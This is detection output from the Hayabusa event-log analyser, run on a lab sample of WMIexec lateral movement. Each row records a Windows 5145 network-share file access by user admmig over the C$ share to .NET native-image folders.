10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\6a2929eeb7b5fa6ff9ef1b0f4ff440f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#\efd939ad16f7521ac6c0c15afdcb2fa2 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\8bb4776b03f3c369fd0c81c51cf468ac : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\92388fbe99436e6ed1f56ee56f10c565 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\9bb6d55c49486153c1c1872929def220 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#\373b26e93f287f3cda45a6282a1de0d3 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#\9551a2df153a961cbbcb79bca937a833 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#\db7fe97a2a840dcc0278f7af89ea7fbe : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\be1a119716bb1de8469b568ec9e31d9c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\e1c86f334a29d92ca264950085cd817e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#\8bda9cd4f7d015f685bae38300b2c281 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#\276763baa173e2b94a6318e28594e7ee : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\619034abb9a9fb1b3dc32c0a9aa38d3c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI\e4b5f01da74352b18e1dffd68b611367 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework\8a1ed041bc25980a548a96cf4b78f4b6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#\6f2318339b6bd916c3c62b95c91b305d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\352d34797f7cd44cd0973c33539200f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\a4c49e23c0c23b5db4c663738eac897e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn\d82382933ba69165a4398eba2fb6c0b2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System\c24d08cc4e93fc4f6f15a637b00a2721 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#\1a6ec0d19dfcc35f62014ff3602e6a54 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#\86d8003fea61ae88dd34584f08a9393c : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#\a6af57d6c4eee4a8e0165604baa15b61 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities\16738205fa35676f5eda6d7d70169936 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#\0a1d9187e911a67185317ffa7ee40ef0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn\14b968adbdb2082b1b938b20b5cb24b5 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#\10dd4c410de361a8ee03b5b7c662ccc9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\7845e0cf7da2edf653fbcc126cda2f48 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#\9db094774e9db914aedfcad797c955d7 : IP Address: 